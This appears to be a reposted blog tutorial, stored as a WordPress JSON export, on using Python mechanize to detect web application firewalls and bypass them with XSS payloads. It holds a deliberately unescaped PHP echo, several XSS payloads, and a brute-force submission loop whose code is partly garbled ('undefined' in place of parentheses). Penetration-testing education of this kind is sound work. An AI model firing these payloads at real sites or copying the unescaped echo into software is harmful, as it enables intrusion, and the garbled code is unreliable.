{"id":464,"date":"2018-10-17T11:42:05","date_gmt":"2018-10-17T11:42:05","guid":{"rendered":"https:\/\/www.appservgrid.com\/paw92\/index.php\/2018\/10\/17\/use-python-to-detect-and-bypass-web-application-firewall\/"},"modified":"2018-10-17T11:42:05","modified_gmt":"2018-10-17T11:42:05","slug":"use-python-to-detect-and-bypass-web-application-firewall","status":"publish","type":"post","link":"https:\/\/www.appservgrid.com\/paw92\/index.php\/2018\/10\/17\/use-python-to-detect-and-bypass-web-application-firewall\/","title":{"rendered":"Use Python To Detect And Bypass Web Application Firewall"},"content":{"rendered":"

\n<\/a><\/p>\n

Web application firewalls are usually placed in front of the web
\nserver to filter the malicious traffic coming towards server. If you are
\n hired as a penetration tester for some company and they forgot to tell
\nyou that they are using web application firewall than you might get into
\n a serious mess. The figure below depicts the working of a simple web
\napplication firewall:<\/p>\n

As
\n you can see its like a wall between web traffic and web server, usually
\n now a days web application firewalls are signature based.<\/p>\n

\nWhat is a signature based firewall?<\/h3>\n

\nIn
\n a signature based firewall you define signatures, as you know web
\nattacks follow similar patters or signatures as well. So we can define
\nthe matching patterns and block them, i.e.<\/p>\n

\nPayload :- <svg><script>alert&grave;1&grave;<p><\/p>\n

\nThe
\n payload defined above is a kind of cross site scripting attack, and we
\nknow that all these attacks can contain following substring -> “<script>”,
\n so why don’t we define a signature that can block a web traffic if it
\ncontains this sub string, we can define 2-3 signatures as defined below:<\/p>\n

<\/p>\n

    \n
  1. <script><\/li>\n
  2. alert(*)<\/li>\n<\/ol>\n

    \nFirst
    \n signature will block any request that contains <script>
    \nsubstring, and second one will block alert(any text). So, this is how
    \nsignature based firewall works.<\/p>\n

    <\/p>\n

    \nHow to know there is a firewall?<\/h2>\n

    \"web-applicaion-firewall-cyberpersons\"<\/a><\/p>\n

    \nIf
    \n you are performing a penetration test and you didn’t know that there
    \nwas a firewall blocking the traffic than it can waste a lot of your
    \ntime, because most of the time your attack payloads are getting blocked
    \nby the firewall not by your application code, and you might end up
    \nthinking that the application you are testing have a secure good and is
    \ngood to go. So, it is a good idea to first test for web application
    \nfirewall presence before you start your penetration test.<\/p>\n

    \nMost of
    \nthe firewalls today leave some tracks about them, now If you attack a
    \nweb application using the payload we defined above and get the following
    \n response:<\/p>\n

    HTTP\/1.1 406 Not Acceptable
    \nDate: Mon, 10 Jan 2016
    \nServer: nginx
    \nContent-Type: text\/html; charset=iso-8859-1
    \nNot Acceptable!Not Acceptable! An appropriate representation of the<\/p>\n

    requested resource could not be found on this server. This error was generated by Mod_Security.<\/p>\n

    You
    \n can clearly see that your attack was blocked by the Mod_Security
    \nfirewall. In this article we will see how we can develop a simple python
    \n script that can do this task detecting firewall and bypassing it.<\/p>\n

    <\/p>\n

    \nStep 1: Define HTML Document and PHP Script!<\/h2>\n

    \nWe
    \n will have to define our HTML document for injection of payload and
    \ncorresponding PHP script to handle the data. We have defined both of
    \nthem below.<\/p>\n

    \nWe will be using the following HTML Document<\/b>:<\/p>\n

    <html>
    \n<body>
    \n<form name=”waf” action=”waf.php” method=”post”>
    \nData: <input type=”text” name=”data”><br>
    \n<input type=”submit” value=”Submit”>
    \n<\/form>
    \n<\/body>
    \n<\/html><\/p>\n


    <\/b>
    \nPHP Script:<\/b>

    <\/b>
    \n
    <html>
    \n<body>
    \nData from the form : <?php echo $_POST[“data”]; ?><br>
    \n<\/body>
    \n<\/html><\/p>\n

    \nStep 2: Prepare malicious request!<\/h2>\n

    \nOur
    \nsecond step towards detecting the firewall presence is creating a
    \nmalicious cross site scripting request that can be blocked by the
    \nfirewall. We will be using a python module called ‘Mechanize’, to know
    \nmore about this module please read the following article :<\/p>\n

    \nIf
    \n you already know about Mechanize, you can skip reading the article. Now
    \n that you know about Mechanize, we can select the web form present on
    \nany page and submit the request. Following code snippet can be used to
    \ndo that:<\/p>\n

    import mechanize as mec
    \nmaliciousRequest = mec.Browser()
    \nformName = ‘waf’
    \nmaliciousRequest.open(“http:\/\/check.cyberpersons.com\/crossSiteCheck.html”)
    \nmaliciousRequest.select_form(formName)\n<\/p>\n

    \nLets discuss this code line wise:<\/p>\n

    <\/p>\n

      \n
    1. On the first line we’ve imported the mechanize module and given it a short name ‘mec’ for later reference.<\/li>\n
    2. To
      \n download a web page using mechanize, instantiation of browser is
      \nrequired. We’ve just did that in the second line of the code.<\/li>\n
    3. On
      \n the first step we’ve defined our HTML document, in which the form name
      \nwas ‘waf’, we need to tell mechanize to select this form for submission,
      \n so we’ve this name in a variable called formName.<\/li>\n
    4. Than we
      \nopened this url, just like we do in a browser. After the page gets
      \nopened we fill in the form and submit data, so opening of page is same
      \nhere.<\/li>\n
    5. Finally we’ve selected the form using ‘select_form’ function passing it ‘formName’ variable.<\/li>\n<\/ol>\n

      \nAs
      \n you can see in the HTML source code, that this form have only one input
      \n field, and we are going to inject our payload in that field and once we
      \n receive response we’re going to inspect it for know strings to detect
      \nthe presence of the web application firewall.<\/p>\n

      <\/p>\n

      \nStep 3: Prepare the payload<\/h2>\n

      \nIn our HTML document we’ve specified one input field using this code:<\/p>\n

      \ninput type=”text” name=”data”><br><\/p>\n

      \nYou can see that name of this field is ‘data’, we can use following bit of code to define input for this field :<\/p>\n

      crossSiteScriptingPayLoad = “<svg><script>alert&grave;1&grave;<p>”<\/p>\n

      maliciousRequest.form[‘data’] = crossSiteScriptingPayLoad<\/p>\n

        \n
      1. First line saves our payload in a variable.<\/li>\n
      2. In a second line of code, we’ve assigned our payload to a form field ‘data’.<\/li>\n<\/ol>\n

        We can now safely submit this form and inspect the response.<\/p>\n

        <\/p>\n

        \nStep 4: Submit the form and record Response<\/h2>\n

        \nCode I am going to mention after this line will submit the form and record the response:<\/p>\n

        maliciousRequest.submit()
        \nresponse = maliciousRequest.response().read()<\/p>\n

        print response<\/p>\n

          \n
        1. Submit the form.<\/li>\n
        2. Save the response in a variable.<\/li>\n
        3. Print the response back.<\/li>\n<\/ol>\n

          As I currently have no firewall installed, the response I got is :<\/p>\n

          \"no-web-application-firewall-present\"<\/p>\n

          \nAs
          \n you can see that payload is printed back to us, means no filtering is
          \npresent on the application code and due to the absence of firewall our
          \nrequest was also not blocked.<\/p>\n

          <\/p>\n

          \nStep 5: Detect the Presence of firewall<\/h2>\n

          \nVariable
          \n named ‘response’ contains the response we got from server, we can use
          \nthe response to detect presence of firewall. We will try to detect the
          \npresence of following firewalls in this tutorial.<\/p>\n

          <\/p>\n

            \n
          1. WebKnight.<\/li>\n
          2. Mod_Security.<\/li>\n
          3. Dot Defender.<\/li>\n<\/ol>\n

            \nLet see how we can achieve this with python code:<\/p>\n

            if response.find(‘WebKnight’) >= 0:
            \n print “Firewall detected: WebKnight”
            \nelif response.find(‘Mod_Security’) >= 0:
            \n print “Firewall detected: Mod Security”
            \nelif response.find(‘Mod_Security’) >= 0:
            \n print “Firewall detected: Mod Security”
            \nelif response.find(‘dotDefender’) >= 0:
            \n print “Firewall detected: Dot Defender”
            \nelse:
            \n print “No Firewall Present”<\/p>\n

            \nIf Web Knight firewall is
            \ninstalled and our request got blocked, response string will contain
            \n‘WebKnight’ inside it some where, so find function will return value
            \ngreater than 0, that means WebKnight firewall is present. Similarly we
            \ncan check for other 2 firewalls as well.<\/p>\n

            \nWe can extend this small application to detect for as many number of firewalls, but you must know there response behavior.<\/p>\n

            <\/p>\n

            \nUsing Brute force to bypass Firewall filter<\/h2>\n

            \nI’ve
            \n mentioned in the start of the article that mostly firewall these days
            \nblock requests based on signatures. But there are hundreds and thousands
            \n of ways you can construct a payload. Java script is becoming complex
            \nday by day, we can make a list of payloads, and try each of them, record
            \n each response and check if we was able to bypass the firewall or not.
            \nPlease note that if firewall rules are well defined than this approach
            \nmight not work. Let see how we can brute force using python:<\/p>\n

            listofPayloads = [‘&lt;dialog open=”” onclose=”alertundefined1)”&gt;&lt;form method=”dialog”&gt;&lt;button&gt;Close me!&lt;\/button&gt;&lt;\/form&gt;&lt;\/dialog&gt;’, ‘&lt;svg&gt;&lt;script&gt;prompt&amp;#40 1&amp;#41&lt;i&gt;’, ‘&lt;a href=”&amp;#1;javascript:alertundefined1)”&gt;CLICK ME&lt;a&gt;’]
            \nfor payLoads in listofPayloads:
            \n maliciousRequest = mec.Browserundefined)
            \n formName = ‘waf’
            \n maliciousRequest.openundefined”http:\/\/check.cyberpersons.com\/crossSiteCheck.html”)
            \n maliciousRequest.select_formundefinedformName)
            \n maliciousRequest.form[‘data’] = payLoads
            \n maliciousRequest.submitundefined)
            \n response = maliciousRequest.responseundefined).readundefined)
            \n if response.findundefined’WebKnight’) &gt;= 0:
            \n print “Firewall detected: WebKnight”
            \n elif response.findundefined’Mod_Security’) &gt;= 0:
            \n print “Firewall detected: Mod Security”
            \n elif response.findundefined’Mod_Security’) &gt;= 0:
            \n print “Firewall detected: Mod Security”
            \n elif response.findundefined’dotDefender’) &gt;= 0:
            \n print “Firewall detected: Dot Defender”
            \n else:
            \n print “No Firewall Present”<\/p>\n

            <\/p>\n

              \n
            1. On the first line we’ve defined a list of 3 payloads, you can extend this list and add as many payloads as you require.<\/li>\n
            2. Then inside the for loop we did the same process we did above, but this time for each payload in a list.<\/li>\n
            3. Upon receiving response we again compare and see see if firewall is present on not.<\/li>\n<\/ol>\n

              \nAs I’ve had no firewall installed, my output was:<\/p>\n

              \n\"no-firewall-present\"<\/p>\n

              \nConvert HTML Tags to Unicode or Hex Entities<\/h2>\n

              If
              \n for example firewall is filtering html tags like <, >. We can
              \nsend their corresponding Unicode or Hex Entities and see if they are
              \nbeing converted to there original form, if so, than this could be an
              \nentry point as well. Code below can be used to examine this process:<\/p>\n

              listofPayloads = [‘&lt;b&gt;’,’u003cbu003e’,’x3cbx3e’]
              \nfor payLoads in listofPayloads:
              \n maliciousRequest = mec.Browser()
              \n formName = ‘waf’
              \n maliciousRequest.open(“http:\/\/check.cyberpersons.com\/crossSiteCheck.html”)
              \n maliciousRequest.select_form(formName)
              \n maliciousRequest.form[‘data’] = payLoads
              \n maliciousRequest.submit()
              \n response = maliciousRequest.response().read()
              \n print “—————————————————”
              \n print response
              \n print “—————————————————”<\/p>\n

              Each
              \n time we will send the encoded entry and in the response we will examine
              \n if it got converted or printed back without conversion, when I ran this
              \n code I got the this output :<\/p>\n

              \n\"cross-site-scripting-encoded-html-tags\"\n<\/p>\n

              \nMeans none of the encoded entry got converted to its original form.<\/p>\n

              <\/p>\n

              \nConclusion<\/h2>\n

              \nThe
              \n purpose of this article was to train you in advance so that you can
              \npenetrate your firewall before a hacker can do. It is always a good
              \nchoice to self test your network infrastructure for vulnerabilities,
              \nbecause our first concern always is to get our application up and
              \nrunning and we overlook the security part. But it must not be over
              \nlooked, because later it can be a huge headache.<\/p>\n

              \nComplete source code can be downloaded from this <\/p>\n

              link<\/a><\/p>\n

              .<\/p>\n

              Author Info:<\/b>
              <\/b>
              \nUsman Nasir, founder, and author of               Cyberpersons<\/a>
              \n is a Computer Science student. I also worked as a technical support
              \nstaff at various hosting companies and love to write about Linux and web
              \n application security.<\/p>\n

              Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

              Web application firewalls are usually placed in front of the web server to filter the malicious traffic coming towards server. If you are hired as a penetration tester for some company and they forgot to tell you that they are using web application firewall than you might get into a serious mess. The figure below … <\/p>\n

              Continue reading “Use Python To Detect And Bypass Web Application Firewall”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-464","post","type-post","status-publish","format-standard","hentry","category-linux"],"_links":{"self":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts\/464","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/comments?post=464"}],"version-history":[{"count":0,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/posts\/464\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/media?parent=464"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/categories?post=464"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.appservgrid.com\/paw92\/index.php\/wp-json\/wp\/v2\/tags?post=464"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}